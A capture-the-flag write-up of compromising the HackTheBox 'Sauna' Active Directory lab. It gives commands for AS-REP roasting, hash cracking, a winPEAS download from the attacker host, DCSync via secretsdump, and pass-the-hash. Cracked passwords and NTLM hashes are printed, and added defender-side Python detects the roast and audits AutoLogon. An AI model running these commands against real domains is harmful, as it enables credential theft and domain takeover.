HackTheBox - Sauna
This was my first simulated intrusion of a domain. I referred to a lot of material and still ran into the following problems:
1. Domain username naming conventions
2. Privilege escalation
3. Mainly, the overall approach
My approach was wrong from the start: I put the emphasis on cracking domain users' passwords and overlooked the TGT tickets. (Left it running a day and a night with rockyou.txt filling all the memory. Unbelievable.)
I just discovered that the HTB machines can ping each other, so before cracking a password you can upload the wordlist to a machine you have already rooted, which speeds things up a great deal. The only drawback is that it gets reset easily.
Port scan
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-01 15:57:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Port 80 had no useful information. I started enumerating usernames with Metasploit and got [sauna, hsmith, administrator]. The plan at this point was to crack hsmith's password (my i7 with 16G of RAM ran at full load for a day and a night, tears).
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile ~/Desktop/sauna/sauna.txt -dc-ip 10.10.10.175
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile ~/Desktop/sauna/sauna.txt -dc-ip 10.10.10.175 -format john -outputfile ~/Desktop/out1.txt
./GetUserSPNs.py EGOTISTICAL-BANK.LOCAL/administrator -dc-ip 10.10.10.175 -no-pass -save
// This kerbrute is far too memory hungry; even with a single thread it exhausts the resources.
python kerbrute.py -users /usr/share/wordlists/rockyou.txt -domain EGOTISTICAL-BANK.LOCAL -threads 1
sudo python3 ./kerbrute.py -users ~/Desktop/sauna/sauna.txt -domain EGOTISTICAL-BANK.LOCAL -passwords ~/Desktop/sauna/xaf -outputfile ~/Desktop/out.txt
sudo python3 ./kerbrute.py -users ~/Desktop/sauna/sauna.txt -domain EGOTISTICAL-BANK.LOCAL -dc-ip 10.10.10.175 -passwords /usr/share/wordlists/rockyou.txt -outputfile ~/Desktop/out.txt
Enumeration did yield the domain SID and some other information, but still no breakthrough.
enum4linux
god@win7:~$ enum4linux 10.10.10.175
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
hsmith's password can be obtained, but the check takes a very long time: the password is correct, yet there is no successful-login message. You have to check the logs by hand, because the password has expired. (Only found this out later.)
Breakthrough: obtained fsmith's user information. What a trap. At first I focused all my attention on the hsmith user and spent a huge amount of time there.
python3 ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -k -usersfile ~/Desktop/user.txt -dc-ip 10.10.10.175 -format john -outputfile ~/Desktop/out1.txt -debug
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:e7518ac5963903ebf7c2be87354f354d$652303eb37c9c4494d81c7d96e617d39cedb27b08e2a5b5920b482d85d19ea220e39514ef01992e7e869b18bdc0c3860857837640487e814fa6023bddfb5cd942241059398cf195a81808b030bfdada05ea8c18977733b4fc0330561560bfe9363aa7d7fd930cad327d0461864dfc9fe503cb8f613ef2e37786683be6bccd998efcf95432429c9f02154bfdbf5126f98fef0a9757301dc1d89e513d5816147b7fc6ca35ad2e51ccbcd8e3a3373681e917d1b51d5d009c5f80a54dc769617b7f64a72b541805b770717b49e1fdcb322f9e2609f9dade5ba42413ab7e9ef90b38097343f947e0a7f3abb5e281d2cf0d29404237517fe132f8186b2054b8e47f72f
god@win7:~/project/impacket/examples$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/out1.txt
Password obtained: Thestrokes23
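As an added, defender-side example (not part of the original writeup): the AS-REP roast above leaves a footprint in the domain controller's Security log. This Python snippet runs over constructed Event 4768 records and flags accounts that obtained a TGT without pre-authentication, plus source hosts generating bursts of unknown-principal failures like the kerbrute runs earlier. The flattened key=value layout and all sample values are assumptions.

```python
import re

# Constructed sample of Windows Security Event 4768 (Kerberos TGT requested)
# records, flattened to key=value lines. Field names follow the real event
# schema; values are made up to mirror this box's attack path.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=FSmith IpAddress=10.10.14.231 "
    "PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=HSmith IpAddress=10.10.10.50 "
    "PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=jdoe IpAddress=10.10.14.231 "
    "PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=asmith IpAddress=10.10.14.231 "
    "PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=bjones IpAddress=10.10.14.231 "
    "PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Split one flattened event record into a field -> value dict."""
    return dict(FIELD_RE.findall(line))


def asrep_roast_candidates(events):
    """Successful TGT requests issued without pre-authentication.

    PreAuthType 0 means the KDC returned an AS-REP without a pre-auth
    timestamp, which is what GetNPUsers relies on; etype 0x17 (RC4) makes
    the resulting hash cheap to crack, so it is reported alongside.
    """
    hits = []
    for ev in map(parse_event, events):
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x0" \
                and ev.get("PreAuthType") == "0":
            hits.append((ev["TargetUserName"], ev["IpAddress"],
                         ev.get("TicketEncryptionType", "?")))
    return hits


def enumeration_sources(events, threshold=3):
    """Source IPs with at least `threshold` 'client principal unknown' (0x6)
    failures: a burst of these from one host is the footprint of username
    enumeration such as the kerbrute runs above."""
    counts = {}
    for ev in map(parse_event, events):
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            counts[ev["IpAddress"]] = counts.get(ev["IpAddress"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The lasting fix is to clear the "Do not require Kerberos preauthentication" flag on the account; the detection only tells you it was used.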
god@win7:~/project/impacket/examples$ ./GetADUsers.py EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -all
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Querying 10.10.10.175 for information about domain.
Name                  Email                           PasswordLastSet             LastLogon
--------------------  ------------------------------  --------------------------  --------------------------
Administrator                                         2020-01-24 12:14:15.321116  2020-02-10 11:16:17.478519
Guest                                                 <never>                     <never>
krbtgt                                                2020-01-23 00:45:30.587720  <never>
HSmith                                                2020-01-23 00:54:34.140321  <never>
FSmith                                                2020-01-23 11:45:19.047096  2020-05-02 07:42:57.864912
svc_loanmgr                                           2020-01-24 18:48:31.678079
Usernames known so far:
administrator
guest
krbtgt
Hsmith
Fsmith > already obtained
svc_loanmgr
After connecting with Evil-WinRM, the check turned up the following:
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-WebRequest http://10.10.14.231/winPEAS.exe -O winPEAS.exe
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Looking AppCmd.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
An auto-logon account is configured. I did not find anywhere that AppCmd.exe was actually in use.
Getting administrator
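As an added example, not from the original post: the AutoLogon finding above can be audited offline from a `reg export` of the Winlogon key. This snippet parses a constructed export and reports an enabled AutoAdminLogon and a stored plaintext DefaultPassword without echoing the secret; the sample registry text is an assumption.

```python
import re

# Constructed excerpt of `reg export` output for the Winlogon key. The value
# names are the real ones winPEAS reads; the data mirrors what the scan above
# reported on this box. It is not a real export.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultDomainName"="EGOTISTICALBANK"
"DefaultUserName"="svc_loanmanager"
"DefaultPassword"="Moneymakestheworldgoround!"
"Shell"="explorer.exe"
'''

VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_values(text, key_suffix):
    """Return name -> data for the string values under the first key whose
    path ends with key_suffix (REG_SZ only, which is all Winlogon uses here)."""
    values, in_key = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line.rstrip("]").endswith(key_suffix)
            continue
        m = VALUE_RE.match(line)
        if in_key and m:
            values[m.group(1)] = m.group(2)
    return values


def autologon_findings(text):
    """Flag an enabled AutoAdminLogon and any plaintext DefaultPassword.

    The password itself is deliberately not echoed, only its length, so the
    audit output can be shared without leaking the credential again.
    """
    v = parse_reg_values(text, "\\Winlogon")
    findings = []
    if v.get("AutoAdminLogon") == "1":
        findings.append("AutoAdminLogon enabled for %s\\%s"
                        % (v.get("DefaultDomainName", "?"), v.get("DefaultUserName", "?")))
    if v.get("DefaultPassword"):
        findings.append("plaintext DefaultPassword stored (length %d)"
                        % len(v["DefaultPassword"]))
    return findings
```

Any hit here means the account's password is readable by every local user; rotate it and remove the DefaultPassword value rather than just disabling AutoAdminLogon.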
god@win7:~/project/impacket/examples$ ./secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e00cf6141ad7e04cf4b0517f95eeb856:::
[*] Kerberos keys grabbed
[*] Cleaning up...
Then, at this point, I tried the method found online and it actually worked.
Finally, get root.txt
god@win7:~$ evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:22 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f3ee04965c68257382e31502cc5e881f